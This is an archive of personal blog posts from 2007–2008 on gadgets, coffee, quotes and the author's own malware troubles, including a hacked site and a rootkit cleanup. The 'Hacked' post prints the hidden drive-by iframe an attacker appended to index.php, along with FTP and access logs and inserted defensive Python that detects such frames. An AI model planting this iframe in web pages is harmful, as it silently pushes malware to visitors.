Archive for the ‘Geekess’ Category

My XO Laptop

Thursday, January 24th, 2008

My XO Laptop is almost here. Watch this space for a
technical writeup and demo video.

----- Original Message -----
From: OLPC Customer Care
To: banth@…..
Sent: Thursday, January 24, 2008 2:30 AM
Subject: Your XO Laptop

Dear Donor,
We wrote you several days ago to let you know that your donation is in our
shipping queue for the shipment of your XO laptop.
We are awaiting the arrival of new inventory so that we may ship your laptop
to you. We will send you another update in the next few days when we have
specific shipping information.
We appreciate your generosity and patience.
Sincerely,
OLPC Donor Services

TFTD: Thinks you think up

Tuesday, January 22nd, 2008

“Think left and think right and think low and think high. Oh, the thinks you can think up if only you try!”
– Dr. Seuss

Tata ‘NANO’ - The $2500 “People’s Car”

Friday, January 11th, 2008

Mr. Ratan N. Tata, Chairman of the Tata Group and Tata Motors, today unveiled the Tata ‘NANO’ - The People’s Car from Tata Motors that India and the world have been looking forward to. A development, which signifies a first for the global automobile industry, the People’s Car brings the comfort and safety of a car within the reach of thousands of families. The People’s Car will be launched in India later in 2008.

“I observed families riding on two-wheelers – the father driving the scooter, his young kid standing in front of him, his wife seated behind him holding a little baby. It led me to wonder whether one could conceive of a safe, affordable, all-weather form of transport for such a family. Tata Motors’ engineers and designers gave their all for about four years to realise this goal. Today, we indeed have a People’s Car, which is affordable and yet built to meet safety requirements and emission norms, to be fuel efficient and low on emissions. We are happy to present the People’s Car to India and we hope it brings the joy, pride and utility of owning a car to many families who need personal mobility.”
– Mr. Ratan N. Tata, Chairman of the Tata Group and Tata Motors, speaking at the unveiling ceremony at the 9th Auto Expo in New Delhi.

technical info to follow…

TFTD from The Hacker’s Diet

Wednesday, January 9th, 2008

Thought for the day:

“Actually, it seems to me the life of a middle aged male is a race between hair falling out of its own accord and getting ripped out over stress and irritation. Women have it harder—they have to rip it all out.”
– John Walker, founder of Autodesk in The Hacker’s Diet, Electronic Edition, 1993.

Senseo Pod People

Monday, January 7th, 2008

Senseo® - Gourmet Coffee Everytime Anytime™

Right before the holidays I broke my Senseo single-cup coffeemaker. It’s been utter hell. I even resorted to grinding beans in the blender with banana, vanilla, and soy milk…

In the course of looking for good deals on a new Senseo, I found the above website. You take the quiz, you share the Senseo with a couple of your other friends’ email addresses, and a couple of days later they send you an offer by email to get a new Senseo for $15 shipping and handling. You can’t beat that!

It arrived today, two days later. I’m amazed.

The coffee pods for the Senseo come in packs of 16 or 18 for $4 or $5 a pack. If you’re used to a 10-cup coffeemaker, 30¢ a cup sounds pretty pricey. However, if you drink that overpriced swill from the Coffee Nazis at St*rbuck’s you’ll save over $1 over a Tall latte. Use 2 coffee pods for espresso or a Grande, and you still save. Heh, I like my caffeine thick.

Why do they call their small coffee “Tall?”

When I got tired of the limited selection of coffee pods for the Senseo, I bought an Ecopad Refillable Coffee Filter from amazon.com. It saves me money and enables me to use whatever coffee I want. I’m rather partial to Cafe Bustelo. Anyway, I’ve tried other coffee pods for the Senseo and they don’t work well - I think they don’t allow enough pressure to build up in the Senseo.

The best part of getting a Senseo is you don’t have to learn a whole new language just to get a cup of coffee. Has anyone else noticed that if you don’t say your coffee order right, St*rbuck’s is sold out of your first choice in scones?

Gusano Bagel

Sunday, December 2nd, 2007

It would, of course, have been far easier to reformat my hard drive.

The problem seems to be a bagel variant and has something to do with files named
C:\WINDOWS\system32\drivers\hidr.exe
C:\WINDOWS\system32\drivers\srosa.sys
and possibly an infected NETWAITING.EXE file.

I have tried multiple rootkit detection and removal programs with varying degrees of success.

McAfee Security Center says that no parts of my McAfee software are enabled. It says that parts of the software are missing and I have to reinstall.

McAfee Rootkit Detective 1.1 flagged hidr.sys and said it would remove it, but it didn’t.

F-Secure Online Virus Scanner is unable to download all its files - I suspect the bug is blocking them. Their Blacklight program has been integrated into the new scanner. Oh well.

AVG Free won’t install - it can’t find one of its installation files - I assume the malware is deleting it. AVG is my number one favorite free antivirus program.

Panda Anti-rootkit, available from Download.com, found the files and renamed one of them, but the problem came back next boot. Panda offers a number of free tools too, including an online scanner called ActiveScan and a beta online scanner named nano-scan. The big thing they offer is repair utilities for specific infections.

EliBagle v10.75 located the files and a registry entry. I rebooted in safe mode. I deleted the files. I deleted the registry entry. And just to be certain, I deleted the preload file for hidr.exe.

At this point IE is no longer going out to strange web sites. I can only hope that it was unable to download something even worse while McAfee was down.

My McAfee subscription is still active, but I haven’t decided whether to reinstall or to switch to something cheaper and just as useless.


Time to Make the Bagels

Friday, November 30th, 2007

I found a related topic on the What the Tech forums.
http://forums.whatthetech.com/Someonething…ml&hl=srosa

It may be the same as my problem. The tool mentioned in the article, Blacklight, is no longer available, but the company has a dozen or so FREE special-purpose disinfecting tools. Time to make the donuts… errrr…. bagels.

Update 12/3/2007:
Got it! With a couple of utilities and a brief foray into the frightening forest of “safe mode.” Why do they call it safe mode when you can do so much damage from there?

Please, folks, I’m just messing around here. DON’T DO WHAT I DID TO FIX YOUR PROBLEM!!! I’m an old lady who does regular backups and I often screw things up bad enough that I have to reformat. One thing about having two hard drives is that your data is (usually) safe from your tender ministrations.

So.

This thing seems to have been a Bagel variant. The gist of it is that it runs as a driver. An “intercept directory listings and delete anti-virus files” sort of a driver. Regular spyware cleaners don’t even look at drivers. So that’s what a rootkit is! Now things are starting to make sense. HJT didn’t list this bug.

Bagel hid its files well. Once I ran something to detect rootkits I had something to work with - filenames and registry entries. I couldn’t find anything to clean it automatically, but as I said, I’m not afraid to reformat. In a DOS command shell “dir sr*” listed the file srosa.sys. No other way of listing the directory could see it. Not “dir,” not “dir s*.” I couldn’t list hidr.wtfever it was called, but when I tried to delete it the error message indicated that the file was indeed there but couldn’t be deleted. Safe mode it is. I deleted the files, modified the registry, and sacrificed a small animal to the ‘Net God in hopes that my laptop would reboot after what I did. Hey, stuff happens.

So after all that garbage, my laptop is no longer going out to sites in Eastern Bloc countries looking for… trouble. My hope is that I didn’t delete some driver that, say, enables me to play movies or burn mp3 CDs for the car. That remains to be seen.

However, there is an entry left in the registry called LEGACY_SROSA. Since it doesn’t expressly list the path of “srosa” I’m not sure whether to delete it.

Hacked

Sunday, November 18th, 2007

Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan - it didn’t flag the executable - and I suppose I should grab AdAware or Spybot S&D or both.

<IFRAME name='StatPage'
src='upgrade.exe' width=5 height=5
style='display:none'></IFRAME>

Now if you’ll excuse me, I’m going to go boil my laptop.
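A check a site owner can run over their own pages for this kind of injected frame, as an added example that is not part of the original post. The extension list, the 5-pixel threshold, the sample page tail and the `video.example` URL are assumptions made for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumptions: the extension list and the pixel threshold are choices made for this example.
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat")
TINY_PX = 5

# Constructed page tail: the iframe from the post, then an ordinary visible embed.
SAMPLE = """\
<?php get_footer(); ?>
</body></html>
<IFRAME name='StatPage' src='upgrade.exe' width=5 height=5 style='display:none'></IFRAME>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
"""

def _px(value):
    """Return a width/height attribute as an int, or None if absent or not numeric."""
    m = re.fullmatch(r"\s*(\d+)(px)?\s*", value or "")
    return int(m.group(1)) if m else None

class FrameAudit(HTMLParser):
    """Collect iframes that are hidden, tiny, or load an executable."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):  # tag and attribute names arrive lowercased
        if tag != "iframe":
            return
        a = {k: v or "" for k, v in attrs}
        style = re.sub(r"\s+", "", a.get("style", "")).lower()
        sizes = [_px(a.get(d)) for d in ("width", "height")]
        checks = {
            "hidden": "display:none" in style or "visibility:hidden" in style,
            "tiny": any(s is not None and s <= TINY_PX for s in sizes),
            "executable-src": urlparse(a.get("src", "")).path.lower().endswith(EXEC_EXT),
        }
        reasons = [name for name, hit in checks.items() if hit]
        if reasons:
            self.hits.append((self.getpos()[0], a.get("src", ""), reasons))

def audit(html):
    """Return (line, src, reasons) for every suspicious iframe in the markup."""
    parser = FrameAudit()
    parser.feed(html)
    parser.close()
    return parser.hits

print(audit(SAMPLE))
```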

Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.

Update 11/25:
I am so pwned.

First access of this file - the first person who was infected by my site - gives me an idea when it was uploaded to my server.

68.14.90.4 - - [18/Nov/2007:07:23:21 -0800] "GET /~void/tag/t-gondii/upgrade.exe HTTP/1.1" 404 31911 "http://www.bipolarplanet.com/~void/tag/t-gondii/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"

That’s someone who my webpage may have infected. After that the accesses come several times a page.

This is the ftp access where the hacker uploaded the infection and the hacked index.php:

Sun Nov 18 15:12:32 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/bipolarplanet.com/web_users/void/upgrade.exe b _ i r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ d r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ i r void ftp 0 * c
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Mon Nov 19 02:46:36 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:50:33 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:55:12 2007 0 69.141.48.56 95 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ i r void ftp 0 * c
Mon Nov 19 03:05:05 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/indexhacked.php a _ o r void ftp 0 * c
Mon Nov 19 03:52:48 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ o r void ftp 0 * c
Mon Nov 19 03:52:58 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ d r void ftp 0 * c

66.246.252.53 resolves to sr178.2dayhost.com - that’s the hacker.
69.141.48.56 resolves to c-69-141-48-56.hsd1.pa.comcast.net - that’s me.
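The same reading of the FTP log, automated as an added example (not part of the original post): it parses the xferlog lines above and flags, per remote host, uploaded executables and files that a host downloaded and then re-uploaded larger. The executable-extension list is an assumption.

```python
import os
from datetime import datetime

# The eleven xferlog lines quoted in the post, unchanged.
XFERLOG = """\
Sun Nov 18 15:12:32 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/bipolarplanet.com/web_users/void/upgrade.exe b _ i r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ d r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ i r void ftp 0 * c
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Mon Nov 19 02:46:36 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:50:33 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:55:12 2007 0 69.141.48.56 95 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ i r void ftp 0 * c
Mon Nov 19 03:05:05 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/indexhacked.php a _ o r void ftp 0 * c
Mon Nov 19 03:52:48 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ o r void ftp 0 * c
Mon Nov 19 03:52:58 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ d r void ftp 0 * c
"""

# Assumption: extensions treated as executable (not a list from the post).
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat"}

def parse(line):
    """Split one xferlog line, counting fields from both ends (paths may hold spaces)."""
    t = line.split()
    if len(t) < 18:  # 5 date tokens, 3 fields, path, 9 trailing fields
        return None
    when = datetime.strptime(" ".join(t[:5]), "%a %b %d %H:%M:%S %Y")
    # t[-7] is the direction flag: i = upload, o = download, d = delete
    return {"time": when, "host": t[6], "size": int(t[7]),
            "path": " ".join(t[8:-9]), "direction": t[-7]}

def findings(log):
    """Flag uploaded executables and files a host fetched, then re-uploaded larger."""
    out, fetched = [], {}  # fetched: (host, path) -> size last downloaded
    for rec in filter(None, map(parse, log.splitlines())):
        key = (rec["host"], rec["path"])
        name = os.path.basename(rec["path"])
        if rec["direction"] == "o":
            fetched[key] = rec["size"]
        elif rec["direction"] == "i":
            if os.path.splitext(name)[1].lower() in EXEC_EXT:
                out.append((rec["time"], rec["host"], "executable uploaded", name))
            grew = rec["size"] - fetched.get(key, rec["size"])
            if grew > 0:
                out.append((rec["time"], rec["host"], f"re-uploaded {grew} bytes larger", name))
    return out

for when, host, reason, name in findings(XFERLOG):
    print(when, host, reason, name)
```

Only the 66.246.252.53 session is flagged; the later upload from 69.141.48.56 is smaller than the copy that host had just downloaded, so it is not reported.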

Extreme Sports: RPS-15

Saturday, October 27th, 2007

RPS - 15

This is an extreme version of Rock-Paper-Scissors. There are fifteen hand gestures, each of which wins over seven gestures and loses to seven gestures. With that many gestures, there is only a one-in-fifteen chance of a tie.

Via the Daily Nugget.


WordPress 2.3.1 Upgrade

Saturday, October 27th, 2007

yeah

Just upgraded to WordPress 2.3.1. The release, not the release candidate. I wound up having to go into phpMyAdmin and set the auto_increment value in some of the MySQL tables.

Now that I’ve sorted it out, I have to say that so far I like it. Sidebar widgets and tags are built right in.

